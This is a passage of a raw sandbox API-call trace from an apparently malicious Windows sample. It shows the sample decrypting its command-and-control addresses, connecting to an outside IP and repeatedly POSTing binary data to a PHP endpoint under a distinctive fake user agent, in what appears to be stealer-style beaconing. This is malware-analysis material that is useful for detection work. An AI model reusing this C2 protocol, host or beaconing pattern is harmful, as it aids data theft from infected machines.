0x6a0000 [0233.279] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bf698 [0233.279] GetProcessHeap () returned 0x6a0000 [0233.280] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6daf28 | out: hHeap=0x6a0000) returned 1 [0233.280] GetProcessHeap () returned 0x6a0000 [0233.280] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4be0 [0233.280] GetProcessHeap () returned 0x6a0000 [0233.280] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6daf28 [0233.282] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0233.283] wvsprintfA (in: param_1=0x6daf28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0233.283] GetProcessHeap () returned 0x6a0000 [0233.283] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0233.283] GetProcessHeap () returned 0x6a0000 [0233.283] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6daf28 | out: hHeap=0x6a0000) returned 1 [0233.284] send (s=0x730, buf=0x6bd460*, len=242, flags=0) returned 242 [0233.284] send (s=0x730, buf=0x6bb998*, len=159, flags=0) returned 159 [0233.284] GetProcessHeap () returned 0x6a0000 [0233.284] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6d7f08 [0233.285] recv (in: s=0x730, buf=0x6d7f08, len=4048, flags=0 | out: buf=0x6d7f08*) returned 204 [0233.461] GetProcessHeap () returned 0x6a0000 [0233.461] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0233.461] GetProcessHeap () returned 0x6a0000 [0233.461] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0233.462] GetProcessHeap () returned 0x6a0000 [0233.462] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf698 | out: hHeap=0x6a0000) returned 1 [0233.462] GetProcessHeap () returned 0x6a0000 [0233.462] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0233.462] closesocket (s=0x730) returned 0 [0233.463] GetProcessHeap () returned 0x6a0000 [0233.463] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa90 | out: hHeap=0x6a0000) returned 1 [0233.464] GetProcessHeap () returned 0x6a0000 [0233.464] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0233.464] GetProcessHeap () returned 0x6a0000 [0233.465] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0233.465] GetProcessHeap () returned 0x6a0000 [0233.465] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0233.465] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6d7f08, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1464) returned 0x730 [0233.467] Sleep (dwMilliseconds=0xea60) [0233.471] GetProcessHeap () returned 0x6a0000 [0233.471] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0233.471] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0233.472] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0233.484] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0233.484] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf168) returned 1 [0233.521] GetProcessHeap () returned 0x6a0000 [0233.521] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0233.522] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0233.522] CryptImportKey (in: hProv=0x6bf168, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0233.523] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0233.524] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0233.527] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0233.528] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0233.528] GetProcessHeap () returned 0x6a0000 [0233.528] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0233.529] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0233.530] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0233.530] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0233.532] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0233.533] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0233.533] CryptReleaseContext (hProv=0x6bf168, dwFlags=0x0) returned 1 [0233.533] GetProcessHeap () returned 0x6a0000 [0233.533] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0233.534] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0233.534] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0233.535] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0233.535] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0233.536] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0233.536] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0233.537] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0233.537] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0233.537] GetProcessHeap () returned 0x6a0000 [0233.537] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0233.537] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0233.538] GetProcessHeap () returned 0x6a0000 [0233.538] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0233.538] GetProcessHeap () returned 0x6a0000 [0233.538] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0233.539] GetProcessHeap () returned 0x6a0000 [0233.539] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0233.539] GetProcessHeap () returned 0x6a0000 [0233.539] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0233.540] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0233.540] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0233.545] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0233.546] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0233.554] GetProcessHeap () returned 0x6a0000 [0233.554] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0233.554] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0233.555] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0233.555] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0233.556] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0233.556] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0233.557] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0233.557] GetProcessHeap () returned 0x6a0000 [0233.557] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0233.558] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0233.558] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0233.559] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0233.559] CryptDestroyKey (hKey=0x6ad020) returned 1 [0233.560] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0233.560] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0233.560] GetProcessHeap () returned 0x6a0000 [0233.560] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0233.561] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0233.561] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0233.562] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0233.562] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0233.563] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0233.564] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0233.564] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0233.564] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0233.564] GetProcessHeap () returned 0x6a0000 [0233.564] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0233.565] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0233.565] GetProcessHeap () returned 0x6a0000 [0233.565] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba990 [0233.565] socket (af=2, type=1, protocol=6) returned 0x734 [0233.565] connect (s=0x734, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0233.588] FreeAddrInfoW (pAddrInfo=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0233.588] GetProcessHeap () returned 0x6a0000 [0233.588] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0233.589] GetProcessHeap () returned 0x6a0000 [0233.589] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6daf28 [0233.589] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0233.590] wvsprintfA (in: param_1=0x6daf28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0233.590] GetProcessHeap () returned 0x6a0000 [0233.591] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bfc98 [0233.591] GetProcessHeap () returned 0x6a0000 [0233.591] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6daf28 | out: hHeap=0x6a0000) returned 1 [0233.591] GetProcessHeap () returned 0x6a0000 [0233.591] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b49a0 [0233.591] GetProcessHeap () returned 0x6a0000 [0233.591] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6daf28 [0233.592] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0233.593] wvsprintfA (in: param_1=0x6daf28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0233.593] GetProcessHeap () returned 0x6a0000 [0233.593] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0233.593] GetProcessHeap () returned 0x6a0000 [0233.593] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6daf28 | out: hHeap=0x6a0000) returned 1 [0233.593] send (s=0x734, buf=0x6bd460*, len=242, flags=0) returned 242 [0233.594] send (s=0x734, buf=0x6bb998*, len=159, flags=0) returned 159 [0233.594] GetProcessHeap () returned 0x6a0000 [0233.594] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6d7f08 [0233.594] recv (in: s=0x734, buf=0x6d7f08, len=4048, flags=0 | out: buf=0x6d7f08*) returned 204 [0233.675] GetProcessHeap () returned 0x6a0000 [0233.675] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0233.675] GetProcessHeap () returned 0x6a0000 [0233.675] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0233.675] GetProcessHeap () returned 0x6a0000 [0233.676] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bfc98 | out: hHeap=0x6a0000) returned 1 [0233.676] GetProcessHeap () returned 0x6a0000 [0233.676] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0233.676] closesocket (s=0x734) returned 0 [0233.677] GetProcessHeap () returned 0x6a0000 [0233.677] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba990 | out: hHeap=0x6a0000) returned 1 [0233.677] GetProcessHeap () returned 0x6a0000 [0233.677] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0233.677] GetProcessHeap () returned 0x6a0000 [0233.677] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0233.677] GetProcessHeap () returned 0x6a0000 [0233.677] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0233.678] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6d7f08, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1468) returned 0x734 [0233.680] Sleep (dwMilliseconds=0xea60) [0233.681] GetProcessHeap () returned 0x6a0000 [0233.682] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0233.682] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0233.683] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0233.687] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0233.688] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beb90) returned 1 [0233.694] GetProcessHeap () returned 0x6a0000 [0233.694] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b9cf8 [0233.695] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0233.696] CryptImportKey (in: hProv=0x6beb90, pbData=0x6b9cf8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0233.696] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0233.696] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0233.697] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0233.697] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0233.697] GetProcessHeap () returned 0x6a0000 [0233.698] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9cf8 | out: hHeap=0x6a0000) returned 1 [0233.698] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0233.699] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0233.699] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0233.700] CryptDestroyKey (hKey=0x6ad020) returned 1 [0233.701] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0233.701] CryptReleaseContext (hProv=0x6beb90, dwFlags=0x0) returned 1 [0233.701] GetProcessHeap () returned 0x6a0000 [0233.701] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0233.702] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0233.702] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0233.703] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0233.703] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0233.704] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0233.704] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0233.705] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0233.705] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0233.705] GetProcessHeap () returned 0x6a0000 [0233.705] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0233.705] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0233.705] GetProcessHeap () returned 0x6a0000 [0233.706] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0233.706] GetProcessHeap () returned 0x6a0000 [0233.707] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0233.707] GetProcessHeap () returned 0x6a0000 [0233.707] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0233.707] GetProcessHeap () returned 0x6a0000 [0233.707] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0233.708] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0233.713] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0233.718] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0233.718] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beb90) returned 1 [0233.724] GetProcessHeap () returned 0x6a0000 [0233.724] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0233.725] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0233.726] CryptImportKey (in: hProv=0x6beb90, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad520) returned 1 [0233.726] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0233.727] CryptSetKeyParam (hKey=0x6ad520, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0233.728] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0233.728] CryptSetKeyParam (hKey=0x6ad520, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0233.728] GetProcessHeap () returned 0x6a0000 [0233.728] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0233.729] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0233.729] CryptDecrypt (in: hKey=0x6ad520, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0233.730] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0233.730] CryptDestroyKey (hKey=0x6ad520) returned 1 [0233.731] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0233.731] CryptReleaseContext (hProv=0x6beb90, dwFlags=0x0) returned 1 [0233.731] GetProcessHeap () returned 0x6a0000 [0233.731] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0233.732] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0233.732] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0233.733] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0233.733] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0233.733] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0233.734] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0233.734] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0233.735] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0233.735] GetProcessHeap () returned 0x6a0000 [0233.735] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0233.735] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0233.735] GetProcessHeap () returned 0x6a0000 [0233.735] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa80 [0233.735] socket (af=2, type=1, protocol=6) returned 0x738 [0233.735] connect (s=0x738, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0233.760] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0233.760] GetProcessHeap () returned 0x6a0000 [0233.760] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf0e0 [0233.760] GetProcessHeap () returned 0x6a0000 [0233.761] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6d8f10 [0233.761] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0233.762] wvsprintfA (in: param_1=0x6d8f10, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0233.762] GetProcessHeap () returned 0x6a0000 [0233.762] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6b99f0 [0233.762] GetProcessHeap () returned 0x6a0000 [0233.762] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8f10 | out: hHeap=0x6a0000) returned 1 [0233.763] GetProcessHeap () returned 0x6a0000 [0233.763] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4910 [0233.763] GetProcessHeap () returned 0x6a0000 [0233.763] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6d8f10 [0233.763] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0233.764] wvsprintfA (in: param_1=0x6d8f10, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: 